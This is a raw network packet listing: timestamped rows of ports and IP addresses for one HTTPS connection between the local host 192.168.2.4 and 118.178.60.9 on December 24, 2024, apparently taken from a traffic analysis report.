Dec 24, 2024 15:13:29.330616951 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.333764076 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.333823919 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.340095043 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.340154886 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.346259117 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.346323967 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.348238945 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.348299026 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.352217913 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.352281094 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.356107950 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.356168032 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.358316898 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.358376980 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.362174034 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.362236023 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.366269112 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.366327047 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.369082928 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.369138956 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.373102903 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.373163939 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.375133038 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.375195980 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.379118919 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.379182100 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.383013010 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.383066893 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.385159016 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.385221004 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.389139891 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.389214039 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.393027067 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.393090010 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.397628069 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.397685051 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.400707960 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.400768995 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.404567957 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.404628038 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.470257998 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.470331907 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.472948074 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.473016024 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.476470947 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.476541042 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.478423119 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.478473902 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.481694937 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.481754065 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.484977007 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.485029936 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.486633062 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.486685991 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.489593029 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.489646912 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.492733002 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.492790937 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.494221926 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.494278908 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.497597933 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.497653961 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.500293016 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.500348091 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.502916098 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.502973080 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.504204988 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.504254103 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.506675959 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.506726027 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.509334087 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.509390116 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.510834932 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.510894060 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.513247013 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.513303995 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.515775919 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.515837908 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.518014908 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.518076897 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.520204067 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.520258904 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.521265984 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.521320105 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.523125887 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.523185968 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.525039911 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.525088072 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.525841951 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.525902033 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.527606964 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.527661085 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.529413939 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.529462099 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.530359983 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.530411959 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.532217979 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.532274961 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.533930063 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.533986092 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.534945011 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.535001040 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.661905050 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.661978006 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.663048983 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.663109064 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.664011002 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.664064884 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.665620089 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.665671110 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.667403936 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.667458057 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.668304920 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.668360949 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.670115948 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.670166016 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.671658039 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.671714067 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.672704935 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.672770977 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.674637079 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.674693108 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.676023006 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.676076889 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.676975965 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.677028894 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.678710938 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.678762913 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.680329084 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.680382967 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.682121992 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.682169914 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.683015108 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.683062077 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.684680939 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.684735060 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.686418056 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.686472893 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.687450886 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.687498093 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.689024925 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.689078093 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.690371990 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.690427065 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.692003012 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.692054987 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.693721056 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.693774939 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.694782019 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.694834948 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.696358919 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.696412086 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.698079109 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.698132992 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.699096918 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.699148893 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.700726986 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.700776100 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.702378035 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.702435970 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.703387022 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.703469992 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.705023050 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.705086946 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.706743956 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.706800938 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.854209900 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.854295969 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.855370998 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.855433941 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.857608080 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.857659101 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.858331919 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.858416080 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.859971046 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.860021114 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.861723900 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.861785889 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.862724066 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.862772942 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.864003897 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.864052057 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.865752935 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.865799904 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.866662979 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.866714001 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.868350983 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.868401051 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.869925976 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.870001078 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.871669054 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.871716976 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.872653961 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.872714043 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.874428034 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.874480963 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.876028061 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.876080990 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.877022028 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.877070904 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.878596067 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.878642082 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.880331993 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.880397081 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.881268978 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.881316900 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.883377075 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.883430004 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.884577990 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.884625912 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.885977030 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.886025906 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.887758970 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.887805939 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.888655901 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.888705015 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.890522003 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.890590906 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.892023087 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.892071962 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.892997980 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.893048048 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.894716978 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.894773960 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.896936893 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.896994114 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.897829056 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.897882938 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:29.899344921 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:29.899393082 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.047152042 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.047336102 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.048187017 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.048249960 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.049959898 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.050013065 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.051495075 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.051552057 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.052503109 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.052555084 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.055110931 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.055169106 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.056859016 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.056917906 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.057727098 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.057785988 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.059297085 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.059346914 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.060637951 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.060688019 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.062030077 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.062087059 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.062750101 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.062805891 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.064532042 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.064583063 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.066150904 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.066225052 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.067137957 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.067190886 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.068768978 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.068821907 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.070442915 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.070497990 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.071495056 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.071547985 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.073350906 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.073401928 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.074510098 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.074562073 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.076101065 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.076152086 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.078018904 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.078094959 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.078915119 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.078977108 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.080604076 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.080657005 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.082154989 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.082205057 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.083149910 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.083203077 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.084820986 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.084875107 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.086489916 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.086556911 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.087399960 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.087454081 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.089158058 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.089210987 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.090831995 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.090883970 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.091931105 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.091983080 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.238782883 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.238878965 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.240621090 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.240678072 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.242064953 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.242119074 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.243724108 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.243773937 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.244637966 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.244688034 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.246476889 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.246526957 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.248114109 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.248164892 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.249119997 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.249176979 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.250678062 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.250729084 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.252425909 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.252476931 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.253304005 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.253354073 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.255076885 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.255127907 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.256690025 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.256738901 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.257684946 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.257735968 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.259438038 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.259490967 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.261213064 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.261264086 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.262305021 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.262360096 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.263997078 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.264058113 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.265497923 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.265552998 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.266700029 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.266746998 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.268387079 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.268435001 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.269377947 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:30.269447088 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:30.271121979 CET	443	49807	118.178.60.9	192.168.2.4
